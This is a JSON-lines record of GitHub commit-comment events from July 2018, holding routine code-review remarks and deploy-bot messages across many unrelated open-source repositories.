{"id":"7920118278","type":"CommitCommentEvent","actor":{"login":"earthlng"},"repo":{"name":"ghacksuserjs/ghacks-user.js"},"payload":{"comment":{"id":29599545,"position":null,"line":null,"path":null,"commit_id":"70abeda9d495edd72d5ca580233af17994e9ba49","created_at":"2018-07-04T21:16:19Z","updated_at":"2018-07-04T21:16:19Z","author_association":"MEMBER","body":"`dom.storageManager.enabled` is default false in ESR52 and it doesn't have the new Site Data UI either so this is a non-issue for ESR52.x users. And the fix for this was uplifted to FF61 and FF60.1-ESR thus it's no longer an issue for current versions and I'd say we can remove both those NOTE lines."}},"created_at":"2018-07-04T21:16:19Z"}
{"id":"7920123094","type":"CommitCommentEvent","actor":{"login":"earthlng"},"repo":{"name":"ghacksuserjs/ghacks-user.js"},"payload":{"comment":{"id":29599558,"position":null,"line":null,"path":null,"commit_id":"70abeda9d495edd72d5ca580233af17994e9ba49","created_at":"2018-07-04T21:18:33Z","updated_at":"2018-07-04T21:18:33Z","author_association":"MEMBER","body":"And we can also make 2730 active again IMO"}},"created_at":"2018-07-04T21:18:33Z"}
{"id":"7920123181","type":"CommitCommentEvent","actor":{"login":"luisptorres"},"repo":{"name":"luisptorres/alarms"},"payload":{"comment":{"id":29599559,"position":4,"line":8,"path":"src/components/Button/index.css","commit_id":"8801f63c15dc83b3041a87f14e000b48e2afed3a","created_at":"2018-07-04T21:18:36Z","updated_at":"2018-07-04T21:18:36Z","author_association":"OWNER","body":":devilxico:"}},"created_at":"2018-07-04T21:18:36Z"}
{"id":"7920124253","type":"CommitCommentEvent","actor":{"login":"goodsoft"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29599562,"position":32,"line":163,"path":"ui/vty/src/Ariadne/UI/Vty/App.hs","commit_id":"6d4278c6f894a4a639019de3468d2e15c27c07e7","created_at":"2018-07-04T21:19:06Z","updated_at":"2018-07-04T21:19:06Z","author_association":"CONTRIBUTOR","body":"Not sure, I need `updateAppFocusRing` _after_ `handleAppEvent ev`."}},"created_at":"2018-07-04T21:19:06Z"}
{"id":"7920125296","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"psiemiatkowski/Tasks"},"payload":{"comment":{"id":29599565,"position":53,"line":53,"path":"src/main/java/com/crud/tasks/trello/client/TrelloClient.java","commit_id":"e98d17dd26040665ff57769c8f0646ca445ff77b","created_at":"2018-07-04T21:19:38Z","updated_at":"2018-07-04T21:19:38Z","author_association":"NONE","body":"Powinno być trochę inaczej, jesteś blisko ;)\r\ndo trelloBoardDtoList powinna być przypisana lista czyli Arrays.asList(tu trzeba wpisać kod, który może być nullem, jeśli tak, zwraca pustą listę)"}},"created_at":"2018-07-04T21:19:38Z"}
{"id":"7920125577","type":"CommitCommentEvent","actor":{"login":"gabbacode"},"repo":{"name":"gabbacode/Kanban.Desktop"},"payload":{"comment":{"id":29599566,"position":14,"line":8,"path":"Kanban.Desktop/Kanban.Desktop.LocalBase/BaseSelector/ViewModel/BaseSelectorViewModel.cs","commit_id":"18802b940c8f6f52bd280068ee67a5695fd2661b","created_at":"2018-07-04T21:19:47Z","updated_at":"2018-07-04T21:19:47Z","author_association":"OWNER","body":"появился ViewModelBase от которого нужно наследоваться, там будут всякие плюшки характерные для всех вью моделей. И да base чаще означает базовый в смысле общий. А когда что-то про базу данных обычно пишут Db"}},"created_at":"2018-07-04T21:19:47Z"}
{"id":"7920128288","type":"CommitCommentEvent","actor":{"login":"asciidoc3"},"repo":{"name":"asciidoc3/asciidoc3"},"payload":{"comment":{"id":29599570,"position":null,"line":null,"path":null,"commit_id":"acf630431b3297de3d31e4cb2b1533f1ad8716e2","created_at":"2018-07-04T21:21:02Z","updated_at":"2018-07-04T21:21:02Z","author_association":"OWNER","body":"\"conflict in ad3.py geloest\"\r\n(German) means (English):\r\n\"conflict in asciidoc3.py solved\" "}},"created_at":"2018-07-04T21:21:02Z"}
{"id":"7920128328","type":"CommitCommentEvent","actor":{"login":"maksbotan"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29599571,"position":32,"line":163,"path":"ui/vty/src/Ariadne/UI/Vty/App.hs","commit_id":"6d4278c6f894a4a639019de3468d2e15c27c07e7","created_at":"2018-07-04T21:21:04Z","updated_at":"2018-07-04T21:21:04Z","author_association":"CONTRIBUTOR","body":"http://hackage.haskell.org/package/base-4.11.1.0/docs/Control-Applicative.html#v:-60--42-\r\n\r\n> Sequence actions, discarding the value of the second argument.\r\n\r\nThat's what applicatives are for, or so I learned at least."}},"created_at":"2018-07-04T21:21:04Z"}
{"id":"7920145087","type":"CommitCommentEvent","actor":{"login":"DocOBITCOIN"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29599606,"position":27,"line":2511,"path":"src/wallet/rpcwallet.cpp","commit_id":"6cf697739c8d718afe05b947c92dc9ddc9402850","created_at":"2018-07-04T21:29:14Z","updated_at":"2018-07-04T21:29:14Z","author_association":"NONE","body":"Got you"}},"created_at":"2018-07-04T21:29:14Z"}
{"id":"7920149323","type":"CommitCommentEvent","actor":{"login":"maksbotan"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29599612,"position":32,"line":163,"path":"ui/vty/src/Ariadne/UI/Vty/App.hs","commit_id":"6d4278c6f894a4a639019de3468d2e15c27c07e7","created_at":"2018-07-04T21:31:13Z","updated_at":"2018-07-04T21:31:13Z","author_association":"CONTRIBUTOR","body":"AFAIU, it won't discard new state, only the _value_ -- () in your case \r\nCome on, it's just liftA2 const"}},"created_at":"2018-07-04T21:31:13Z"}
{"id":"7920149746","type":"CommitCommentEvent","actor":{"login":"fischermatte"},"repo":{"name":"fischermatte/geolud"},"payload":{"comment":{"id":29599613,"position":null,"line":null,"path":null,"commit_id":"c0865fdb4e4ae6caa3f315141145494bc352d7f8","created_at":"2018-07-04T21:31:26Z","updated_at":"2018-07-04T21:31:26Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e616026c-4362-460e-a0fc-b26f0f2f2031?env_id=ibm%3Ayp%3Aus-south \"geolud-toolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/95ed9bd9-62a1-4519-83ff-716671136007?env_id=ibm%3Ayp%3Aus-south \"geolud\") deployed [geolud](https://github.com/fischermatte/geolud/releases/tag/deploy-ibm-yp-us-south-fischermatte-staging-20180704-213125 \"deploy-ibm-yp-us-south-fischermatte-staging-20180704-213125\") to [staging](https://console.bluemix.net/apps/8ea4e46e-9db8-4c70-8f71-37c4a617032d?env_id=ibm:yp:us-south \"ibm:yp:us-south:fischermatte:staging\"), including this commit"}},"created_at":"2018-07-04T21:31:26Z"}
{"id":"7920149963","type":"CommitCommentEvent","actor":{"login":"FadyEssam"},"repo":{"name":"BoostGSoC18/ublas-gpu"},"payload":{"comment":{"id":29599614,"position":8,"line":8,"path":"benchmarks/opencl/Jamfile.v2","commit_id":"aea878b1455ef515de275eb13a09c742a56b6ca2","created_at":"2018-07-04T21:31:32Z","updated_at":"2018-07-04T21:31:32Z","author_association":"COLLABORATOR","body":"Yes, that's right.. it skipped me. I will remove it,"}},"created_at":"2018-07-04T21:31:32Z"}
{"id":"7920152162","type":"CommitCommentEvent","actor":{"login":"hadjipantelis"},"repo":{"name":"hadjipantelis/caret"},"payload":{"comment":{"id":29599623,"position":25,"line":121,"path":"RegressionTests/Code/polr.R","commit_id":"09d826c0709bcce23ddc16cb33e9a85f71fdb2f6","created_at":"2018-07-04T21:32:37Z","updated_at":"2018-07-04T21:32:37Z","author_association":"OWNER","body":"I thin that the previous test was testing a false model. `test_class_rec` would/should be fitted with `ROC` (but it wasn't). Because it wasn't, this test passed as both `test_class_rec` and `test_class_cv_model` were picked based on `Accuracy`. If `ROC` was used there was no reason for this test be guaranteed to pass."}},"created_at":"2018-07-04T21:32:37Z"}
{"id":"7920152830","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29599625,"position":70,"line":70,"path":"tests/qgraph/x86_64_pc-machine.c","commit_id":"fe518fb2c2702f1031c01da252e122d15eeda65e","created_at":"2018-07-04T21:32:57Z","updated_at":"2018-07-04T21:32:57Z","author_association":"OWNER","body":"uhm... again the same problem of undefined symbols. \r\n```\r\nlibqgraph-obj-y = tests/qgraph/qgraph.o tests/libqos/pci.o tests/libqos/pci-pc.o\r\n# adding $(libqos-pc-obj-y)  does not change anything, the problem now is pci.o and pci-pc.o\r\n\r\ncheck-unit-y += tests/test-qgraph$(EXESUF)\r\ntests/test-qgraph$(EXESUF): tests/test-qgraph.o $(libqgraph-obj-y)\r\n```\r\n"}},"created_at":"2018-07-04T21:32:57Z"}
{"id":"7920152855","type":"CommitCommentEvent","actor":{"login":"FadyEssam"},"repo":{"name":"BoostGSoC18/ublas-gpu"},"payload":{"comment":{"id":29599626,"position":1,"line":1,"path":"benchmarks/opencl/ublas_prod.cpp","commit_id":"aea878b1455ef515de275eb13a09c742a56b6ca2","created_at":"2018-07-04T21:32:58Z","updated_at":"2018-07-04T21:32:58Z","author_association":"COLLABORATOR","body":"That means moving benchmarks.hpp and jamfile to benchmarks/ right?  "}},"created_at":"2018-07-04T21:32:58Z"}
{"id":"7920153435","type":"CommitCommentEvent","actor":{"login":"adamgreen"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29599627,"position":62,"line":1874,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.cpp","commit_id":"9af15418eb187bd17ac02f5edae94ee9a6b7fd4f","created_at":"2018-07-04T21:33:15Z","updated_at":"2018-07-04T21:33:15Z","author_association":"NONE","body":"You are missing a byte here in command. It should be 3 bytes long. ```command[1] = address``` and ```command[2] = userData```."}},"created_at":"2018-07-04T21:33:15Z"}
{"id":"7920154190","type":"CommitCommentEvent","actor":{"login":"FadyEssam"},"repo":{"name":"BoostGSoC18/ublas-gpu"},"payload":{"comment":{"id":29599628,"position":5,"line":5,"path":"benchmarks/opencl/ublas_prod.cpp","commit_id":"aea878b1455ef515de275eb13a09c742a56b6ca2","created_at":"2018-07-04T21:33:38Z","updated_at":"2018-07-04T21:33:38Z","author_association":"COLLABORATOR","body":"I added it while experimenting with something.. I will remove it"}},"created_at":"2018-07-04T21:33:38Z"}
{"id":"7920155018","type":"CommitCommentEvent","actor":{"login":"ArtOfCode-"},"repo":{"name":"Charcoal-SE/metasmoke"},"payload":{"comment":{"id":29599632,"position":12,"line":11,"path":"app/controllers/rss_controller.rb","commit_id":"48055fc1c683901563e0e7769f0c665bb2d83146","created_at":"2018-07-04T21:34:02Z","updated_at":"2018-07-04T21:34:02Z","author_association":"MEMBER","body":"This whole nested conditional can be simplified:\r\n\r\n```ruby\r\nif params[:deleted].casecmp('true') != 0 && params[:deleted] != '1'\r\n  @posts = @posts.where(deleted_at: nil)\r\nelse\r\n  @posts = @posts.where.not(deleted_at: nil)\r\nend\r\n```"}},"created_at":"2018-07-04T21:34:02Z"}
{"id":"7920155182","type":"CommitCommentEvent","actor":{"login":"fischermatte"},"repo":{"name":"fischermatte/geolud"},"payload":{"comment":{"id":29599633,"position":null,"line":null,"path":null,"commit_id":"8903b673851af5391b5832428cac185b9b5ae666","created_at":"2018-07-04T21:34:08Z","updated_at":"2018-07-04T21:34:08Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e616026c-4362-460e-a0fc-b26f0f2f2031?env_id=ibm%3Ayp%3Aus-south \"geolud-toolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/56b7f47d-29c7-4af7-a31a-be51e2506c57?env_id=ibm%3Ayp%3Aus-south \"geolud-server\") deployed [geolud](https://github.com/fischermatte/geolud/releases/tag/deploy-ibm-yp-us-south-fischermatte-staging-20180704-213407 \"deploy-ibm-yp-us-south-fischermatte-staging-20180704-213407\") to [staging](https://console.bluemix.net/apps/15c35c46-81b0-41e0-8b7f-0903d93eee72?env_id=ibm:yp:us-south \"ibm:yp:us-south:fischermatte:staging\"), including this commit"}},"created_at":"2018-07-04T21:34:08Z"}
{"id":"7920155426","type":"CommitCommentEvent","actor":{"login":"octave"},"repo":{"name":"jtapia/solidus_mailchimp_sync"},"payload":{"comment":{"id":29599634,"position":null,"line":null,"path":null,"commit_id":"8d0057085ee82c6cbe7f7c7fd5b36ed15a13ce5b","created_at":"2018-07-04T21:34:15Z","updated_at":"2018-07-04T21:34:15Z","author_association":"NONE","body":"@jtapia thanks for your work on this gem! Would you recommend using this branch for solidus 2.6?"}},"created_at":"2018-07-04T21:34:15Z"}
{"id":"7920157052","type":"CommitCommentEvent","actor":{"login":"adamgreen"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29599636,"position":73,"line":1885,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.cpp","commit_id":"9af15418eb187bd17ac02f5edae94ee9a6b7fd4f","created_at":"2018-07-04T21:35:06Z","updated_at":"2018-07-04T21:35:06Z","author_association":"NONE","body":"getUserData shouldn't be const and it should be 2 bytes long. ```getUserData[0] = MIP_CMD_GET_USER_DATA``` and ```getUserData[1] = address```"}},"created_at":"2018-07-04T21:35:06Z"}
{"id":"7920157112","type":"CommitCommentEvent","actor":{"login":"q00u"},"repo":{"name":"jaredkaczynski/SalienCheat"},"payload":{"comment":{"id":29599637,"position":null,"line":null,"path":null,"commit_id":"6e18dd4491feed7cb27006ebd592b5a936c62641","created_at":"2018-07-04T21:35:09Z","updated_at":"2018-07-04T21:35:09Z","author_association":"NONE","body":"Thank you for having done this. It was greatly appreciated!"}},"created_at":"2018-07-04T21:35:09Z"}
{"id":"7920157934","type":"CommitCommentEvent","actor":{"login":"Sija"},"repo":{"name":"veelenga/ameba"},"payload":{"comment":{"id":29599638,"position":24,"line":79,"path":"src/ameba/cli/cmd.cr","commit_id":"248c5a656b4b542e05e1768fc61ef48f1adc88ab","created_at":"2018-07-04T21:35:31Z","updated_at":"2018-07-04T21:35:31Z","author_association":"CONTRIBUTOR","body":"small suggestion:\r\n\r\n```cr\r\nconfig.rules.map! &.tap &.enabled=(true)\r\n```\r\n\r\nditto above"}},"created_at":"2018-07-04T21:35:31Z"}
{"id":"7920158714","type":"CommitCommentEvent","actor":{"login":"getdls"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29599640,"position":null,"line":null,"path":null,"commit_id":"58027b1a6e11c538d4b110297602a499f8745b75","created_at":"2018-07-04T21:35:57Z","updated_at":"2018-07-04T21:35:57Z","author_association":"COLLABORATOR","body":" possible  **to keep** the aspect\r\n\r\nI really need to learn to read the whole commit msg before hitting enter.."}},"created_at":"2018-07-04T21:35:57Z"}
{"id":"7920159412","type":"CommitCommentEvent","actor":{"login":"aphiwat0108"},"repo":{"name":"aphiwat0108/congenial-doodle"},"payload":{"comment":{"id":29599644,"position":null,"line":null,"path":null,"commit_id":"221d33e380c0814bb6fcd9bf15d053edd16ce4d6","created_at":"2018-07-04T21:36:17Z","updated_at":"2018-07-04T21:36:17Z","author_association":"OWNER","body":"@@ -0,0 +1,2 @@\r\n+# congenial-doodle"}},"created_at":"2018-07-04T21:36:17Z"}
{"id":"7920159503","type":"CommitCommentEvent","actor":{"login":"fischermatte"},"repo":{"name":"fischermatte/geolud"},"payload":{"comment":{"id":29599645,"position":null,"line":null,"path":null,"commit_id":"8903b673851af5391b5832428cac185b9b5ae666","created_at":"2018-07-04T21:36:20Z","updated_at":"2018-07-04T21:36:20Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e616026c-4362-460e-a0fc-b26f0f2f2031?env_id=ibm%3Ayp%3Aus-south \"geolud-toolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/95ed9bd9-62a1-4519-83ff-716671136007?env_id=ibm%3Ayp%3Aus-south \"geolud\") deployed [geolud](https://github.com/fischermatte/geolud/releases/tag/deploy-ibm-yp-us-south-fischermatte-staging-20180704-213619 \"deploy-ibm-yp-us-south-fischermatte-staging-20180704-213619\") to [staging](https://console.bluemix.net/apps/8ea4e46e-9db8-4c70-8f71-37c4a617032d?env_id=ibm:yp:us-south \"ibm:yp:us-south:fischermatte:staging\"), including this commit"}},"created_at":"2018-07-04T21:36:20Z"}
{"id":"7920159789","type":"CommitCommentEvent","actor":{"login":"siku2"},"repo":{"name":"DeepSwissVoice/SwissVoice"},"payload":{"comment":{"id":29599646,"position":14,"line":33,"path":"src/js/pages/schreiben.js","commit_id":"0e841ec7849fca91ba9daa7713ea75a25e33346b","created_at":"2018-07-04T21:36:28Z","updated_at":"2018-07-04T21:36:28Z","author_association":"MEMBER","body":"*cough*"}},"created_at":"2018-07-04T21:36:28Z"}
{"id":"7920160497","type":"CommitCommentEvent","actor":{"login":"off99555"},"repo":{"name":"exodrifter/unity-python"},"payload":{"comment":{"id":29599651,"position":17,"line":17,"path":"Examples/Library.cs","commit_id":"1069d363b2c7b9569348db1c686eccaa74b2c144","created_at":"2018-07-04T21:36:49Z","updated_at":"2018-07-04T21:36:49Z","author_association":"NONE","body":"It should be `/python-unity/Lib` instead."}},"created_at":"2018-07-04T21:36:49Z"}
{"id":"7920161222","type":"CommitCommentEvent","actor":{"login":"bjchambers"},"repo":{"name":"raphw/byte-buddy"},"payload":{"comment":{"id":29599655,"position":null,"line":null,"path":null,"commit_id":"3e680ca0f2e0fccb58b800d2619e29d12a5f26cb","created_at":"2018-07-04T21:37:14Z","updated_at":"2018-07-04T21:37:14Z","author_association":"NONE","body":"Looks good, although it looks like there may be some cases (when concatenating multiple Compound.Composable) where some instructions are not converted according to their `andThen`.\r\n\r\nSpecifically, `c.andThen(d)` if `c` and `d` are `Compound.Composable` looks like it will result in the equivalent of:\r\n\r\nimplementations.addAll(c.implementations)\r\nimplementations.add(c.composable) <- not made DROPPING\r\nimplementations.addAll(d.implementations)\r\n\r\ncomposable = d.composable\r\n\r\nSpecifically, when combining multiple `Compound.Composable`, it seems like the `composable` in earlier entries must have have `andThen` called to potentially change its behavior. Alternatively, a zero-argument method could be added to `Composable` that did this conversion (eg., `dropping()`). Then the above could add `c.composable.dropping()`."}},"created_at":"2018-07-04T21:37:14Z"}
{"id":"7920161382","type":"CommitCommentEvent","actor":{"login":"lmqferreira"},"repo":{"name":"Azure-Samples/active-directory-android"},"payload":{"comment":{"id":29599656,"position":null,"line":null,"path":null,"commit_id":"1e6c4d2d94332a8639d9e5e9e1138c2919f5ec34","created_at":"2018-07-04T21:37:18Z","updated_at":"2018-07-04T21:37:18Z","author_association":"NONE","body":"This breaks the build as gradle was not upgraded"}},"created_at":"2018-07-04T21:37:18Z"}
{"id":"7920162768","type":"CommitCommentEvent","actor":{"login":"stefanseefeld"},"repo":{"name":"BoostGSoC18/ublas-gpu"},"payload":{"comment":{"id":29599662,"position":1,"line":1,"path":"benchmarks/opencl/ublas_prod.cpp","commit_id":"aea878b1455ef515de275eb13a09c742a56b6ca2","created_at":"2018-07-04T21:38:05Z","updated_at":"2018-07-04T21:38:05Z","author_association":"COLLABORATOR","body":"Yes."}},"created_at":"2018-07-04T21:38:05Z"}
{"id":"7920163230","type":"CommitCommentEvent","actor":{"login":"adamgreen"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29599663,"position":74,"line":1886,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.cpp","commit_id":"9af15418eb187bd17ac02f5edae94ee9a6b7fd4f","created_at":"2018-07-04T21:38:20Z","updated_at":"2018-07-04T21:38:20Z","author_association":"NONE","body":"The expected response length is 1+2. response[1] should be address and response[2] should be the user data byte you want.\r\n\r\nThat is how I read the documentation anyway.\r\n\r\nIf it was me, I would also not call the set path until I had the get path working without any errors."}},"created_at":"2018-07-04T21:38:20Z"}
{"id":"7920167482","type":"CommitCommentEvent","actor":{"login":"ArtOfCode-"},"repo":{"name":"Charcoal-SE/metasmoke"},"payload":{"comment":{"id":29599681,"position":5,"line":30,"path":"app/views/rss/autoflagged.rss.builder","commit_id":"48055fc1c683901563e0e7769f0c665bb2d83146","created_at":"2018-07-04T21:40:38Z","updated_at":"2018-07-04T21:40:38Z","author_association":"MEMBER","body":"typo"}},"created_at":"2018-07-04T21:40:38Z"}
{"id":"7920170096","type":"CommitCommentEvent","actor":{"login":"adamgreen"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29599684,"position":4,"line":501,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.h","commit_id":"9af15418eb187bd17ac02f5edae94ee9a6b7fd4f","created_at":"2018-07-04T21:42:01Z","updated_at":"2018-07-04T21:42:01Z","author_association":"NONE","body":"To be consistent with the rest of the API, I would use ```uint8_t``` instead of ```byte```.  I know that byte is more customary in Arduino land but in the rest of my embedded development I use the stdint.h typedefs which make the sign and size explicit. It also makes it much easier to port code from one platform to another. For example a lot of my MiP code actually started out on the Macintosh."}},"created_at":"2018-07-04T21:42:01Z"}
{"id":"7920170130","type":"CommitCommentEvent","actor":{"login":"renatostore"},"repo":{"name":"eubr-atmosphere/tma-framework-a"},"payload":{"comment":{"id":29599685,"position":null,"line":null,"path":null,"commit_id":"d363326729929153c39a8fa81b8a8308f268762a","created_at":"2018-07-04T21:42:02Z","updated_at":"2018-07-04T21:42:02Z","author_association":"COLLABORATOR","body":"adding ASTAH file to quality model privacy"}},"created_at":"2018-07-04T21:42:02Z"}
{"id":"7920171791","type":"CommitCommentEvent","actor":{"login":"EversonDelmaschio"},"repo":{"name":"EversonDelmaschio/Trabalho-integrado-7periodo"},"payload":{"comment":{"id":29599695,"position":null,"line":null,"path":null,"commit_id":"53890fecb8a4220176eaae12b760c89962fc77b2","created_at":"2018-07-04T21:42:55Z","updated_at":"2018-07-04T21:42:55Z","author_association":"OWNER","body":"atulizando"}},"created_at":"2018-07-04T21:42:55Z"}
{"id":"7920172350","type":"CommitCommentEvent","actor":{"login":"EversonDelmaschio"},"repo":{"name":"EversonDelmaschio/Trabalho-integrado-7periodo"},"payload":{"comment":{"id":29599697,"position":null,"line":null,"path":null,"commit_id":"53890fecb8a4220176eaae12b760c89962fc77b2","created_at":"2018-07-04T21:43:13Z","updated_at":"2018-07-04T21:43:13Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-04T21:43:13Z"}
{"id":"7920173109","type":"CommitCommentEvent","actor":{"login":"lucianosky"},"repo":{"name":"lucianosky/MarvelAPITest"},"payload":{"comment":{"id":29599707,"position":null,"line":null,"path":null,"commit_id":"a0da6b3766c0abccd5a8cc49d3d97400cf6910c3","created_at":"2018-07-04T21:43:37Z","updated_at":"2018-07-04T21:43:37Z","author_association":"OWNER","body":"Now CharacterListVC is tested with a VM mock"}},"created_at":"2018-07-04T21:43:37Z"}
{"id":"7920173217","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29599712,"position":null,"line":null,"path":null,"commit_id":"ac29bd0c72b292c10e988a026df3ba2d3aaeda33","created_at":"2018-07-04T21:43:40Z","updated_at":"2018-07-04T21:43:40Z","author_association":"CONTRIBUTOR","body":"> so the name SPELL_AURA_MOD_CASTING_SPEED_NOT_STACK is wrong? :)\r\n\r\n@dagochen long ago, enum in spellwork were based on mangos enum. The later ones evolved on their own way as the core was developed and there are now some UNK in spellwork that are labelled in cmangos or some names that mismatch, as killerwife pointed out. It is thus better when looking how a specific spell is handled in core to use the actual values for aura/effect/target instead of the enum name.\r\n\r\n@killerwife so if I understand correctly, the spell applies because one of its two auras applies: the cast time speed reduction (effect0) is not applied but the language change (effect1) is applied, hence the lack of immunity feedback. I'm not sure this is the proper behaviour: as the two effects are binary, I think both of them should apply or none at all. But this is unrelated to your commit that is indeed working as it should. Thanks for the explanation. :)"}},"created_at":"2018-07-04T21:43:40Z"}
{"id":"7920175453","type":"CommitCommentEvent","actor":{"login":"sagniKdas53"},"repo":{"name":"sagniKdas53/YouTube--dl-termux"},"payload":{"comment":{"id":29599751,"position":null,"line":null,"path":null,"commit_id":"0fb32b2ce6988a34deb5bf0fea2f8df8f5a66010","created_at":"2018-07-04T21:44:49Z","updated_at":"2018-07-04T21:44:49Z","author_association":"OWNER","body":"Recheck"}},"created_at":"2018-07-04T21:44:49Z"}
{"id":"7920175951","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29599761,"position":null,"line":null,"path":null,"commit_id":"00990367a1e06dd0a4773c9a48f1c820f9c456bc","created_at":"2018-07-04T21:45:06Z","updated_at":"2018-07-04T21:45:06Z","author_association":"CONTRIBUTOR","body":"Subquestion codes are validated during tsv import, so it won't work. Feel free to test."}},"created_at":"2018-07-04T21:45:06Z"}
{"id":"7920178427","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29599770,"position":12,"line":99,"path":"application/models/Question.php","commit_id":"ae2a46cd5c33738b621bcd23360d8c4db7402830","created_at":"2018-07-04T21:46:23Z","updated_at":"2018-07-04T21:46:23Z","author_association":"CONTRIBUTOR","body":"OK, I get what you mean. Sigh. Didn't know about that rule, and your suggestion might work too."}},"created_at":"2018-07-04T21:46:23Z"}
{"id":"7920179040","type":"CommitCommentEvent","actor":{"login":"thatcatxedo"},"repo":{"name":"thatcatxedo/yowhatup"},"payload":{"comment":{"id":29599773,"position":null,"line":null,"path":null,"commit_id":"dad613afe3ea0bb6eb399f91cca466a52d19819d","created_at":"2018-07-04T21:46:45Z","updated_at":"2018-07-04T21:46:45Z","author_association":"OWNER","body":"I like it. "}},"created_at":"2018-07-04T21:46:45Z"}
{"id":"7920180167","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29599779,"position":12,"line":99,"path":"application/models/Question.php","commit_id":"ae2a46cd5c33738b621bcd23360d8c4db7402830","created_at":"2018-07-04T21:47:25Z","updated_at":"2018-07-04T21:47:25Z","author_association":"CONTRIBUTOR","body":"Please try to reproduce the issue, you'll see what's wrong."}},"created_at":"2018-07-04T21:47:25Z"}
{"id":"7920183071","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29599785,"position":70,"line":70,"path":"tests/qgraph/x86_64_pc-machine.c","commit_id":"fe518fb2c2702f1031c01da252e122d15eeda65e","created_at":"2018-07-04T21:49:05Z","updated_at":"2018-07-04T21:49:05Z","author_association":"NONE","body":"The emoji is okay. No need to include pci and pci-pc here, they're only for the \"actual graph\" tests which we are leaving out of the first part."}},"created_at":"2018-07-04T21:49:05Z"}
{"id":"7920184208","type":"CommitCommentEvent","actor":{"login":"raphw"},"repo":{"name":"raphw/byte-buddy"},"payload":{"comment":{"id":29599789,"position":null,"line":null,"path":null,"commit_id":"3e680ca0f2e0fccb58b800d2619e29d12a5f26cb","created_at":"2018-07-04T21:49:41Z","updated_at":"2018-07-04T21:49:41Z","author_association":"OWNER","body":"If `c` and `d` are `Compound.Composable`, a new `Compound.Composable` would be created:\r\n\r\n```\r\nnew Compound.Composable(c.implementations, c.composable.andThen(d))\r\n```\r\n\r\nThe `c.implementations` would be prepended as required. The inner composable would be resolved against `d` where if `c.composable` was for example a `MethodCall` the return value of the `c` chain would be dropped.\r\n\r\n`c.composable` with the dropped return value would be appended to the list after `c.implementations` and `d` would be unfolded to append all `d.implementations` adding `d.composable` to be the next in line for a new composition.\r\n\r\nI am flattening the composables as the nesting can really kill the JIT in some cases."}},"created_at":"2018-07-04T21:49:41Z"}
{"id":"7920187119","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29599795,"position":71,"line":71,"path":"tests/qgraph/x86_64_pc-machine.c","commit_id":"fe518fb2c2702f1031c01da252e122d15eeda65e","created_at":"2018-07-04T21:51:20Z","updated_at":"2018-07-04T21:51:20Z","author_association":"NONE","body":"Yeah it makes sense, it's reverse edge vs reverse arguments. Considering that reverse edge affects qgraph.o only, whole reverse arguments affects all users, I lean towards qos_node_consumes.\r\n\r\n(You can see how the split patches make review much easier!! All these things were not as clear when patches were grouped \"temporally\" in the order of development, rather than logically)."}},"created_at":"2018-07-04T21:51:20Z"}
{"id":"7920196403","type":"CommitCommentEvent","actor":{"login":"Nord18"},"repo":{"name":"Nord18/cv"},"payload":{"comment":{"id":29599818,"position":null,"line":null,"path":null,"commit_id":"0a2eb4a80770fbcda33e9c3243dafebcfe0c7381","created_at":"2018-07-04T21:56:31Z","updated_at":"2018-07-04T21:56:31Z","author_association":"OWNER","body":"read me"}},"created_at":"2018-07-04T21:56:31Z"}
{"id":"7920198564","type":"CommitCommentEvent","actor":{"login":"pengibot"},"repo":{"name":"pengibot/swot"},"payload":{"comment":{"id":29599824,"position":null,"line":null,"path":null,"commit_id":"5d5344dfe7d4c0ff62f9d576757686de456a044a","created_at":"2018-07-04T21:57:43Z","updated_at":"2018-07-04T21:57:43Z","author_association":"OWNER","body":"renamed file to have .txt on the end"}},"created_at":"2018-07-04T21:57:43Z"}
